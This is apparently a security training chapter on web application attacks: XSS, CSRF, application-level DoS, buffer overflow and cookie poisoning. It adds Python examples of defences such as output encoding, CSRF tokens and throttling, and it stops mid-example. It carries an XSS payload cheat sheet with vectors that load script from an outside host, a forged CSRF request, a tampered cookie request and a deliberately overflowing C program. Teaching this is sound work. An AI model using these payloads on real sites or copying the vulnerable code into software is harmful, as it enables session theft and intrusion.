Cross-site scripting, also called XSS, exploits vulnerabilities in dynamically generated web pages that let an attacker inject client-side script, such as JavaScript, into pages viewed by other users. It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. When a web application reflects or stores input from one user, an attacker can supply input that propagates to other users as well. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. The end user trusts the web application, and the attacker exploits that trust in order to do things that would not be allowed under normal conditions. An attacker often encodes the malicious portion of the tag (for example, with Unicode or URL encoding) so that the request looks genuine to the user. Consequences of XSS include:
* Malicious script execution
* Session hijacking
* Brute force password cracking
* Redirecting to a malicious server
* Exploiting user privileges
* Data theft
* Intranet probing
* Ads in hidden IFRAMEs and pop-ups
* Data manipulation
* Keylogging and remote monitoring



How XSS Attacks Work

To understand how cross-site scripting is typically exploited, consider the following hypothetical example. The vulnerable page handles requests for a nonexistent page, a classic 404 error page, and echoes the requested URL back into the response.

Normal request:
    http://juggyboy.com/jason_file.html

Server response:
    404 Not found /jason_file.html

Server code (handles requests for a nonexistent page, a classic 404 error page):

    <html>
    <body>
    <?php
    // REQUEST_URI is attacker-controlled; it is URL-decoded and written
    // into the page without any HTML encoding
    print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
    ?>
    </body>
    </html>

XSS attack code:
    http://juggyboy.com/<script>alert("WARNING: The application has encountered an error");</script>

Server response: the script tag is written into the 404 page verbatim, so the victim's browser executes it in the security context of juggyboy.com.

FIGURE 13.15: How XSS Attacks Work
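As an added example (not code from the module), the following Python mirrors the 404 handler above: one function URL-decodes the request URI and writes it straight into the page, the other applies HTML entity encoding after decoding. The encoded attack URI shows why decoding before output matters: %3C becomes < before the page is built, so URL encoding in the request is no protection on its own. The first URI is the page's own example; the encoded variant is constructed.

```python
import html
from urllib.parse import unquote

# The page's attack URI and a constructed URL-encoded variant of the same idea.
ATTACK_URI = '/<script>alert("WARNING: The application has encountered an error");</script>'
ENCODED_ATTACK_URI = "/%3Cscript%3Ealert(1)%3C/script%3E"


def not_found_vulnerable(request_uri):
    """Mirrors print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
    the decoded URI goes into the HTML body without any encoding."""
    return f"<html><body>Not found: {unquote(request_uri)}</body></html>"


def not_found_safe(request_uri):
    """Decode first (so the user sees the path they asked for), then encode
    for the HTML body context; quote=True also neutralises quotes, which
    matters if the same value is ever echoed inside an attribute."""
    shown = html.escape(unquote(request_uri), quote=True)
    return f"<html><body>Not found: {shown}</body></html>"


def contains_script_tag(page):
    """What a browser would act on: an unescaped <script opening tag."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(contains_script_tag(not_found_vulnerable(ATTACK_URI)))          # True
    print(contains_script_tag(not_found_vulnerable(ENCODED_ATTACK_URI)))  # True: %3C was decoded
    print(contains_script_tag(not_found_safe(ATTACK_URI)))                # False
    print(not_found_safe(ATTACK_URI))
```

Output encoding has to match the context the value lands in; html.escape is correct for element content and quoted attributes, but a value placed inside a script block or a URL needs the encoding for that context instead.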


Cross-Site Scripting Attack Scenario: Attack via Email

Sample lure email: "Hi, You have won a lottery of $2M, click the link to claim it." followed by a link of the form <A HREF=http://juggyboy.com/...>.

1. The attacker sends the email with the malicious link.
2. The user clicks the malicious link.
3. The server sends a page to the user with the client profile (in the figure: Name: Shaun, Age: 31, Location: UK, Occupation: SE, Last visit: Sept 21, 2010).
4. The malicious code is executed in the client web browser.

Cross-Site Scripting Attack Scenario: Attack via Email
In a cross-site scripting attack via email, the attacker crafts an email that contains a link carrying a malicious script and sends it to the victim.

Malicious link:
    <A HREF="http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>

When the user clicks on the link, the URL is sent to legitimateSite.com with the malicious code in the clientprofile parameter. The server sends a page back to the user that includes the value of clientprofile, and the malicious code is executed on the client's machine. The following diagram depicts the cross-site scripting attack scenario via email:


Flow: the attacker sends an email with the malicious link; the user clicks it; the request is received by the legitimate server, which returns the page with the client profile and the injected script; the malicious code executes in the client web browser.
FIGURE 13.16: Attack via Email



XSS Example: Attack via Email
The following are the steps involved in an XSS attack via email:
1. Construct a malicious link:
    <A HREF="http://juggyboybank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>
2. Email the URL to the user and convince the user to click on it.
3. The user's browser requests the page from the legitimate server.
4. The legitimate server sends a response page containing the malicious script.
5. The malicious script runs in the user's browser.


Participants: User's Browser, Malicious Script, Attacker's Server, Legitimate Server. Step 1, construct a malicious link:
    <A HREF="http://juggyboybank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>
FIGURE 13.17: Attack via Email



XSS Example: Stealing Users' Cookies
To steal a user's cookies with the help of an XSS attack, the attacker looks for XSS vulnerabilities and then plants a cookie stealer (cookie logger). The steps involved are:
1. The attacker hosts a page with a malicious script.
2. The user visits the page hosted by the attacker.
3. The attacker's server responds with HTML containing the malicious script.
4. The user's browser runs the malicious script.
5. The cookie logger in the malicious script collects the user's cookies.
6. The malicious script redirects the user to the attacker's server.
7. The user's browser sends the request with the user's cookies.
Marking session cookies HttpOnly prevents script from reading them through document.cookie, which defeats this particular exfiltration path, although not the underlying XSS.

Module 13 Page 1787


FIGURE 13.18: Stealing Users' Cookies (diagram: User's Browser, Malicious Script, Attacker's Server. Steps shown: host a page with malicious script; view the page hosted by the attacker; HTML containing malicious script; run; collect user's cookies; redirect to attacker's server; send the request with the user's cookies)

Module 13 Page 1788


XSS Example: Sending an Unauthorized Request

[Slide diagram: User's Browser, Malicious Script, Attacker's Server. Steps shown: construct a malicious link; email the URL to the user and convince the user to click on it; request the page; page with malicious script; run; an authorized request]

XSS Example: Sending an Unauthorized Request
Using an XSS attack, the attacker can also send an unauthorized request. The following are the steps involved in an XSS attack intended to send an unauthorized request:
1. The attacker constructs a malicious link
2. The attacker sends an email containing the URL to the user and convinces the user to click on it
3. The user's browser sends a request to the attacker's server for the page
4. The attacker's server, in response to the user's request, sends the page with the malicious script
5. The user's browser runs the malicious script
6. The malicious script sends an authorized request

Module 13 Page 1789


FIGURE 13.19: Sending an Unauthorized Request

Module 13 Page 1790


XSS Attack in Blog Posting

[Slide diagram: Web Application, Malicious Website. The malicious code <script>onload=window.location='http://www.juggyboy.com'</script> is injected into the blog post; the user is redirected to the malicious website juggyboy.com]

XSS Attack in a Blog Posting

The following diagram depicts the XSS attack in a blog posting:

FIGURE 13.20: XSS Attack in a Blog Posting (diagram: Database Server, Web Application, Malicious Website. The attacker adds a malicious script in the comment field of the blog post; the malicious code <script>onload=window.location='http://www.juggyboy.com'</script> is injected into the blog post; the comment with the malicious link is stored on the server; the user is redirected to the malicious website juggyboy.com)


Module 13 Page 1791


XSS Attack in Comment Field

[Slide diagram: the user visits the TechPost website, which shows the post "Facebook acquires file-sharing service: New York-based start-up that lets users privately and sporadically share files through a drag-and-drop interface with additional options" and the comment "Jason, I love your blog post! -Mark (mark@miccasoft.com)". In the "Leave your comment" field the attacker enters the malicious code <script>alert("Hello World")</script>, which is injected into the blog post; the comment with the malicious link is stored on the server (Database Server, Web Application); the alert pops up as soon as the web page is loaded (Pop-up Window showing "Hello World")]

XSS Attack in a Comment Field
Many Internet web programs use HTML pages that dynamically accept data from different sources. The data in the HTML pages can be dynamically changed according to the request. Attackers use the HTML web page's tags to manipulate the data and launch the attack by changing the comment feature with a malicious script. When the target views the comment and activates it, the malicious script is executed in the target's browser, initiating malicious actions.
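As an added example (not the module's own code), the following shows the comment-field attack above rendered by a vulnerable page and by one that HTML-encodes stored comments, together with the HttpOnly cookie attribute that removes the cookie-logger step from the cookie-stealing sequence; the blog comments, session ID and function names are constructed for the example.

```python
"""Stored XSS in a comment field: vulnerable vs. hardened rendering.

Added example, not from the module. The comments and the session ID are
constructed; the payload is the module's <script>alert("Hello World")</script>.
"""
import html
from http.cookies import SimpleCookie

# Constructed sample comments as the web application would store them;
# the second one is the attacker's injected script from the module.
STORED_COMMENTS = [
    ("Mark", "Jason, I love your blog post!"),
    ("Attacker", '<script>alert("Hello World")</script>'),
]


def render_comment_vulnerable(author: str, body: str) -> str:
    """Concatenates stored text straight into the page. The browser parses
    the injected <script> element and runs it for every visitor."""
    return f"<p><b>{author}</b>: {body}</p>"


def render_comment_safe(author: str, body: str) -> str:
    """HTML-encodes the untrusted text: '<' becomes '&lt;', '"' becomes
    '&quot;', so the payload is displayed literally and never executed."""
    return (f"<p><b>{html.escape(author, quote=True)}</b>: "
            f"{html.escape(body, quote=True)}</p>")


def render_page(comments, safe: bool) -> str:
    renderer = render_comment_safe if safe else render_comment_vulnerable
    return "\n".join(renderer(author, body) for author, body in comments)


def page_contains_script(rendered_html: str) -> bool:
    """Crude check used to show the difference: does the rendered page
    still contain a live <script> start tag?"""
    return "<script" in rendered_html.lower()


def session_cookie_header(session_id: str) -> str:
    """Builds the Set-Cookie header a hardened server should send. HttpOnly
    keeps document.cookie from exposing the session ID to an injected
    script (the cookie-logger step); Secure restricts it to HTTPS."""
    cookie = SimpleCookie()
    cookie["SESSIONID"] = session_id
    cookie["SESSIONID"]["httponly"] = True
    cookie["SESSIONID"]["secure"] = True
    cookie["SESSIONID"]["path"] = "/"
    return cookie["SESSIONID"].OutputString()


if __name__ == "__main__":
    print(render_page(STORED_COMMENTS, safe=False))
    print(render_page(STORED_COMMENTS, safe=True))
    print(session_cookie_header("325896ASDD23SA3587"))
```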

Module 13 Page 1792


FIGURE 13.21: XSS Attack in a Comment Field (diagram: Attacker, Database Server, Web Application, Pop-up Window. The attacker adds a malicious script in the comment field of the blog post, entering "Jason, I love your blog post! <script>alert("Hello World")</script>"; the malicious code <script>alert("Hello World")</script> is injected into the blog post; the comment with the malicious link is stored on the server; the alert pops up as soon as the web page is loaded)

Module 13 Page 1793


XSS Cheat Sheet
XSS locator: '';!--"<XSS>=&{()}
Normal XSS JavaScript injection: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Image XSS: <IMG SRC="javascript:alert('XSS');">
No quotes and no semicolon: <IMG SRC=javascript:alert('XSS')>
Case insensitive XSS attack vector: <IMG SRC=JaVaScRiPt:alert('XSS')>
HTML entities: <IMG SRC=javascript:alert(&quot;XSS&quot;)>
Grave accent obfuscation: <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Malformed IMG tags: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Embedded tab: <IMG SRC="jav	ascript:alert('XSS');"> (a literal tab character between "jav" and "ascript")
Embedded encoded tab: <IMG SRC="jav&#x09;ascript:alert('XSS');">
Embedded new line: <IMG SRC="jav&#x0A;ascript:alert('XSS');">
Embedded carriage return: <IMG SRC="jav&#x0D;ascript:alert('XSS');">
Null chars: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
Non-alpha-non-digit XSS: <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
IMG Dynsrc: <IMG DYNSRC="javascript:alert('XSS')">
IMG lowsrc: <IMG LOWSRC="javascript:alert('XSS')">
BGSOUND: <BGSOUND SRC="javascript:alert('XSS');">
LAYER: <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
STYLE sheet: <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Local htc file: <XSS STYLE="behavior: url(xss.htc);">
VBscript in an image: <IMG SRC='vbscript:msgbox("XSS")'>
Mocha: <IMG SRC="livescript:[code]">
US-ASCII encoding: ¼script¾alert(¢XSS¢)¼/script¾
META: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
TABLE: <TABLE BACKGROUND="javascript:alert('XSS')">
TD: <TABLE><TD BACKGROUND="javascript:alert('XSS')">
Non-alpha-non-digit part 2 XSS: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Extraneous open brackets: <<SCRIPT>alert("XSS");//<</SCRIPT>
No closing script tags: <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
Protocol resolution in script tags: <SCRIPT SRC=//ha.ckers.org/.j>
Half open HTML/JavaScript XSS vector: <IMG SRC="javascript:alert('XSS')"
Double open angle brackets: <iframe src=http://ha.ckers.org/scriptlet.html <
XSS with no single quotes or double quotes or semicolons: <SCRIPT>alert(/XSS/.source)</SCRIPT>
Escaping JavaScript escapes: \";alert('XSS');//
End title tag: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
INPUT image: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

FIGURE 13.22: XSS Cheat Sheet

Module 13 Page 1794


Cross-Site Request Forgery (CSRF) Attack

Cross-Site Request Forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend

The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity

[Slide diagram: User, Trusted Website, Malicious Website. The user logs into the trusted site and creates a new session; the session identifier for the session is stored in a cookie in the web browser; the user visits a malicious website, which sends a request from the user's browser using his session cookie]

Cross-site Request Forgery (CSRF) Attack
Cross-site request forgery is also known as a one-click attack. CSRF occurs when a user's web browser is instructed to send a request to the vulnerable website through a malicious web page. CSRF vulnerabilities are very commonly found on financial-related websites. Corporate intranets usually cannot be accessed by outside attackers, so CSRF is one of the ways an attacker can reach into the network. The web application's inability to differentiate a request made by malicious code from a genuine request exposes it to a CSRF attack. Cross-site request forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend. The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.

Module 13 Page 1795


FIGURE 13.23: Cross-site Request Forgery (CSRF) Attack (diagram: User, Trusted Website, Malicious Website. The user logs into the trusted site and creates a new session; the session identifier for the session is stored in a cookie in the web browser; the user visits a malicious website, which sends a request from the user's browser using his session cookie)

Module 13 Page 1796


How CSRF Attacks Work
In a cross-site request forgery attack, the attacker waits for the user to connect to the trusted server and then tricks the user into clicking on a malicious link containing arbitrary code. When the user clicks on the malicious link, the arbitrary code gets executed on the trusted server. The following diagram explains the step-by-step process of a CSRF attack:

Module 13 Page 1797


Client Side Code

    <form action="buy.php" method="POST">
    <p>Symbol: <input type="text" name="symbol" /></p>
    <p>Shares: <input type="text" name="shares" /></p>
    <p><input type="submit" value="Buy" /></p>
    </form>

Server Code

    <?php
    session_start();
    // $_REQUEST is populated from GET as well as POST parameters, so the
    // purchase below is triggered by the forged image request just as it
    // would be by the legitimate form.
    if (isset($_REQUEST['symbol']) &&
        isset($_REQUEST['shares']))
    {
        buy_stocks($_REQUEST['symbol'], $_REQUEST['shares']);
    }
    ?>

Malicious Code

    <img src="http://juggyboy.com/juggyshop.php?symbol=MSFT&shares=1000" />

Steps shown in the diagram (User, Trusted Server, Attacker, Malicious Server):
1. User logs in to the trusted server using his credentials
2. Server sets a session cookie in the user's browser
3. Attacker sends a phishing mail tricking the user into sending a request to a malicious site
4. User requests a page from the malicious server
5. Response page contains malicious code
6. Malicious code is executed in the trusted server

FIGURE 13.24: How CSRF Attacks Work
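One way the trusted server's buy handler can refuse the forged request in the diagram above, as an added example that is not the module's code: a per-session anti-CSRF token carried in a hidden form field plus a POST-only rule, so the attacker's <img> request (a GET that carries the session cookie but no token) is rejected while the real form still works. The session store, token scheme and function names are constructed for the example.

```python
"""CSRF protection for the stock-purchase form in the module's diagram.

Added example, not the module's code. Simulates the trusted server's buy
handler; SESSIONS, PURCHASES and the function names are constructed.
"""
import hmac
import secrets
from typing import Dict, List, Optional, Tuple

# In-memory stand-in for the server's session store: session id -> data.
SESSIONS: Dict[str, dict] = {}
PURCHASES: List[Tuple[str, str, int]] = []


def login(session_id: str, user: str) -> str:
    """Creates the session and mints a random token bound to it. The token
    goes into the form as a hidden field; the cookie alone never
    authorises a purchase."""
    token = secrets.token_hex(16)
    SESSIONS[session_id] = {"user": user, "csrf_token": token}
    return token


def render_buy_form(session_id: str) -> str:
    """The module's form with the hidden token field added."""
    token = SESSIONS[session_id]["csrf_token"]
    return (
        '<form action="buy.php" method="POST">\n'
        f'<input type="hidden" name="csrf_token" value="{token}" />\n'
        '<p>Symbol: <input type="text" name="symbol" /></p>\n'
        '<p>Shares: <input type="text" name="shares" /></p>\n'
        '<p><input type="submit" value="Buy" /></p>\n'
        '</form>'
    )


def handle_buy(cookie_session: Optional[str], method: str,
               params: Dict[str, str]) -> Tuple[int, str]:
    """Hardened counterpart of the module's buy.php, which acted on any
    $_REQUEST carrying symbol and shares. Returns (HTTP status, message)."""
    session = SESSIONS.get(cookie_session or "")
    if session is None:
        return 401, "not logged in"
    # 1. State-changing actions only by POST: an <img> tag can only GET.
    if method.upper() != "POST":
        return 405, "method not allowed"
    # 2. The request must carry the token that only a page served to this
    #    session could contain; compare in constant time.
    sent = params.get("csrf_token", "")
    if not hmac.compare_digest(sent, session["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    if "symbol" not in params or "shares" not in params:
        return 400, "symbol and shares required"
    try:
        shares = int(params["shares"])
    except ValueError:
        return 400, "shares must be an integer"
    if shares <= 0:
        return 400, "shares must be positive"
    PURCHASES.append((session["user"], params["symbol"], shares))
    return 200, f"bought {shares} {params['symbol']}"


def forged_image_request(session_cookie: str) -> Tuple[int, str]:
    """What the attacker's page causes: the browser fetches the image URL
    and attaches the victim's session cookie automatically, but no token."""
    return handle_buy(session_cookie, "GET",
                      {"symbol": "MSFT", "shares": "1000"})


if __name__ == "__main__":
    tok = login("sid-constructed", "alice")
    print(forged_image_request("sid-constructed"))
    print(handle_buy("sid-constructed", "POST",
                     {"symbol": "MSFT", "shares": "10", "csrf_token": tok}))
```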

Module 13 Page 1798


Web Application Denial-of-Service (DoS) Attack

Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers

Why Are Applications Vulnerable?
- Reasonable Use of Expectations
- Application Environment Bottlenecks
- Implementation Flaws
- Poor Data Validation

Targets: CPU, Memory, and Sockets; Disk Bandwidth; Database Bandwidth; Worker Processes (leading to Web Server Resource Consumption and Web Services Unavailability)

Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as that of the legitimate clients, which makes it undetectable by existing DoS protection measures

Web Application Denial-of-Service (DoS) Attack
Denial-of-service attacks happen when legitimate users are prevented from performing a desired task or operation. Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers. The following issues make web applications vulnerable:
- Reasonable Use of Expectations
- Application Environment Bottlenecks
- Implementation Flaws
- Poor Data Validation

Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as those of legitimate clients, which makes them undetectable by existing DoS protection measures. In a web application denial-of-service attack the attacker targets and tries to exhaust CPU, memory, sockets, disk bandwidth, database bandwidth, and worker processes.

Some of the common ways to perform a web application DoS attack are:
- Bandwidth consumption: flooding a network with data

Module 13 Page 1799


- Resource starvation: depleting a system's resources
- Programming flaws: exploiting buffer overflows
- Routing and DNS attacks: manipulating DNS tables to point to alternate IP addresses

Module 13 Page 1800


Denial-of-Service (DoS) Examples

User Registration DoS
The attacker could create a program that submits the registration forms repeatedly, adding a large number of spurious users to the application

Login Attacks
The attacker may overload the login process by continually sending login requests that require the presentation tier to access the authentication mechanism, rendering it unavailable or unreasonably slow to respond

User Enumeration
If the application states which part of the user name/password pair is incorrect, an attacker can automate the process of trying common user names from a dictionary file to enumerate the users of the application

Account Lock Out Attacks
The attacker may enumerate user names through another vulnerability in the application and then attempt to authenticate to the site using valid user names and incorrect passwords, which will lock out the accounts after the specified number of failed attempts. At this point legitimate users will not be able to use the site

Denial-of-Service (DoS) Examples
Most web applications are designed to serve, or withstand, only a limited number of requests. If the limit is exceeded, the web application may fail to serve the additional requests. Attackers take advantage of this to launch denial-of-service attacks on web applications. Attackers send too many requests to the web application until it is exhausted. Once the web application has received enough requests, it stops responding to other requests even when they are sent by an authorized user, because the attacker has overwhelmed the web application with false requests. Various web application DoS attacks include:

User Registration DoS: The attacker could create a program that submits the registration forms repeatedly, adding a large number of spurious users to the application.

Login Attacks: The attacker overloads the login procedure by repeatedly sending login requests that require the presentation tier to admit the request and access the verification instructions. When the requests overload the process, it becomes slow or unavailable to genuine users.

User Enumeration: When the application responds to a user authentication attempt with an error message stating which item of information is incorrect, the attacker can easily manipulate the procedure by brute forcing common user names from a dictionary file to enumerate the users of the application.

Module 13 Page 1801

Account Lock-Out Attacks: Dictionary attacks can be minimized by applying the account lock method. The attacker may enumerate user names through a vulnerability in the application and then attempt to authenticate to the site using valid user names and incorrect passwords, which will lock out the accounts after the specified number of failed attempts. At this point, legitimate users will not be able to use the site.
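As an added example (not the module's code), a login handler that addresses the two examples above together: the error message never reveals which half of the user name/password pair was wrong, unknown users cost the same hashing work as known ones, and failures are throttled per source within a sliding window rather than locking the account, so an attacker who has enumerated valid user names cannot lock legitimate users out. Accounts, window size, failure limit and PBKDF2 iteration count are constructed for the example.

```python
"""Login handling that resists user enumeration and account lock-out DoS.

Added example, not the module's code. USER_DB, the window/limit values
and the (deliberately low) iteration count are constructed.
"""
import hashlib
import hmac
import os
import time
from collections import defaultdict, deque
from typing import Deque, Dict, Optional, Tuple

WINDOW_SECONDS = 300           # sliding window for counting failures
MAX_FAILURES_PER_SOURCE = 5    # throttle threshold per client source
ITERATIONS = 20_000            # kept low for the example
GENERIC_ERROR = "Invalid user name or password"


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_user_db(credentials: Dict[str, str]) -> Dict[str, Tuple[bytes, bytes]]:
    """Stores (salt, hash) per user; plaintext is never kept."""
    db = {}
    for user, password in credentials.items():
        salt = os.urandom(16)
        db[user] = (salt, _hash_password(password, salt))
    return db


# Constructed sample accounts.
USER_DB = make_user_db({"jason": "correct horse", "mark": "battery staple"})
# A dummy credential so that unknown users cost the same PBKDF2 work as
# known ones; otherwise response time would reveal which names exist.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash_password("dummy", _DUMMY_SALT)


class LoginService:
    def __init__(self, user_db, window: float = WINDOW_SECONDS,
                 limit: int = MAX_FAILURES_PER_SOURCE):
        self.user_db = user_db
        self.window = window
        self.limit = limit
        # source (client IP, device id, ...) -> timestamps of recent failures
        self.failures: Dict[str, Deque[float]] = defaultdict(deque)

    def _recent_failures(self, source: str, now: float) -> int:
        q = self.failures[source]
        while q and now - q[0] > self.window:
            q.popleft()
        return len(q)

    def login(self, source: str, user: str, password: str,
              now: Optional[float] = None) -> Tuple[bool, str]:
        now = time.time() if now is None else now
        if self._recent_failures(source, now) >= self.limit:
            # Throttle the source, not the account: the same user can still
            # sign in from elsewhere, so valid names cannot be weaponised.
            return False, "Too many attempts; try again later"
        salt, stored = self.user_db.get(user, (_DUMMY_SALT, _DUMMY_HASH))
        ok = (hmac.compare_digest(_hash_password(password, salt), stored)
              and user in self.user_db)
        if not ok:
            self.failures[source].append(now)
            return False, GENERIC_ERROR   # identical text for bad user or bad password
        self.failures[source].clear()
        return True, "Welcome"


if __name__ == "__main__":
    svc = LoginService(USER_DB)
    print(svc.login("10.0.0.1", "jason", "correct horse"))
    print(svc.login("10.0.0.1", "nobody", "anything"))
```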

Module 13 Page 1802


Buffer Overflow Attacks

Buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold

A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, and modify internal variables. Attackers modify function pointers used by the application to direct program execution through a jump or call instruction and point it to a location in the memory containing malicious code

Vulnerable Code: the slide shows the same listing that is reproduced in the text below

Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 18: Buffer Overflow

Buffer Overflow Attacks
A buffer has a specified data storage capacity, and if the count exceeds the original, the buffer overflows; this means that a buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold. Typically, buffers are developed to hold finite data; additional information can be directed wherever it needs to go. However, extra information may overflow into neighboring buffers, destroying or overwriting legitimate data.

Arbitrary Code
A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, and modify internal variables. When a buffer overflows, the execution stack of a web application is damaged. An attacker can then send specially crafted input to the web application, so that the web application executes the arbitrary code, allowing the attacker to successfully take over the machine. Attackers modify function pointers used by the application to redirect the program execution through a jump or call instruction to a location in the memory containing malicious code. Buffer overflows are not easy to discover, and even upon discovery they are difficult to exploit. However, an attacker who recognizes a potential buffer overflow can access a staggering array of products and components.

Module 13 Page 1803


Buffer Overflow Potential

Both the web application and server products, which act as static or dynamic features of the site or of the web application, contain the potential for a buffer overflow error. Buffer overflow potential that is found in server products is commonly known and creates a threat to the user of that product. When web applications use libraries, they become vulnerable to a possible buffer overflow attack. Custom web application code, through which a web application is passed, may also contain buffer overflow potential. Buffer overflow errors in a custom web application are not easily detected, and fewer attackers find and develop such errors. If one is found in the custom application (other than one that crashes the application), the ability to use this error is reduced by the fact that neither the source code nor the error message is accessible to the attacker.

Vulnerable Code

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char *dest_buffer;

        /* Only 10 bytes are allocated for the destination buffer. */
        dest_buffer = (char *) malloc(10);
        if (NULL == dest_buffer)
            return -1;

        if (argc > 1)
        {
            /* strcpy() copies argv[1] without checking its length: an argument
               of 10 or more characters writes past the end of the 10-byte heap
               buffer. This is the overflow the text describes. */
            strcpy(dest_buffer, argv[1]);
            printf("The first command-line argument is %s.\n", dest_buffer);
        }
        else
        {
            printf("No command-line argument was given.\n");
        }

        free(dest_buffer);
        return 0;
    }

Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 17: Buffer Overflow Attacks.

Module 13 Page 1804

Cookie/Session Poisoning

Cookies are used to maintain session state in the otherwise stateless HTTP protocol

Modify the Cookie Content: Cookie poisoning attacks involve the modification of the contents of a cookie (personal information stored in a web user's computer) in order to bypass security mechanisms

Inject the Malicious Content: Poisoning allows an attacker to inject malicious content, modify the user's online experience, and obtain unauthorized information

Rewriting the Session Data: A proxy can be used for rewriting the session data, displaying the cookie data, and/or specifying a new user ID or other session identifiers in the cookie

Cookie/Session Poisoning
Cookies frequently transmit sensitive credentials and can be modified with ease to escalate access or assume the identity of another user. Cookies are used to maintain a session state in the otherwise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the web application. Poisoning of cookies and session information can allow an attacker to inject malicious content or otherwise modify the user's online experience and obtain unauthorized information. Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. Cookies exist as files stored in the client computer's memory or hard disk. By modifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the ability to "Remember me?" and store the user's information in a cookie, so he or she does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. In an attempt to protect cookies, site developers often encode the cookies. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give many who view cookies a false sense of security.

Module 13 Page 1805


Threats
The compromise of cookies and sessions can provide an attacker with user credentials, allowing the attacker to access the account in order to assume the identity of other users of an application. By assuming another user's online identity, the original user's purchase history can be reviewed, new items can be ordered, and the services and access that the vulnerable web application provides are open for the attacker to exploit. One of the easiest examples involves using the cookie directly for authentication. Another method of cookie/session poisoning uses a proxy to rewrite the session data, displaying the cookie data and/or specifying a new user ID or other session identifiers in the cookie. Cookies can be persistent or non-persistent and secure or non-secure, so a cookie falls into one of these four variants. Persistent cookies are stored on disk and non-persistent cookies are stored in memory. Secure cookies are transferred only through SSL connections.

Module 13 Page 1806


How Cookie Poisoning Works

[Slide diagram: User, Web Server, Attacker]

The user browses a web page; the web server replies with the requested page and sets a cookie on the user's browser:

    GET /store/buy.aspx?checkout=yes HTTP/1.0
    Host: www.juggyshop.com
    Accept: */*
    Referrer: http://www.juggyshop.com/showprods.aspx
    Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=11568;

The attacker steals the cookie (sniffing, XSS, phishing attack) and orders a product using the modified cookie:

    GET /store/buy.aspx?checkout=yes HTTP/1.0
    Host: www.juggyshop.com
    Accept: */*
    Referrer: http://www.juggyshop.com/showprods.aspx
    Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=100;

The product is delivered to the attacker's address

How Cookie Poisoning Works
Cookies are mainly used by web applications to simulate a stateful experience for the end user. They are used as an identity on the server side of web application components. This attack alters the value of a cookie at the client side prior to the request being sent to the server. A web server can set a cookie in any response by sending the cookie string in a Set-Cookie header. The cookies are stored on the user's computer and are a standard way of recognizing users. Once a cookie has been set, it is sent to the web server with every subsequent request. To provide further functionality to the application, cookies can be modified and analyzed by JavaScript. In this attack, the attacker sniffs the user's cookies, modifies the cookie parameters, and submits them to the web server. The server then accepts the attacker's request and processes it.

Module 13 Page 1807


The following diagram explains the process of a cookie poisoning attack: the user browses a page, the web server replies and sets the cookie, the attacker steals the cookie (sniffing, XSS, phishing), submits an order with the modified cookie (TotalPrice changed from 11568 to 100), and the product is delivered to the attacker's address.

FIGURE 13.25: How Cookie Poisoning Works
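The attack works because the server trusts BasketSize, ItemN and TotalPrice exactly as the client sends them back. The following added example (not code from the module) shows the two server-side checks that defeat it: an HMAC over the basket fields, so a cookie edited on the client fails verification, and recomputation of the total from a server-side catalog. The secret key and the catalog prices are constructed for the example.

```python
import hashlib
import hmac

# Constructed for this example (not from the page): an HMAC key known only to the
# server and a price catalog keyed by the item ids that appear in the slide's cookie.
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"
CATALOG = {"1258": 3856, "2658": 3856, "6652": 3856}


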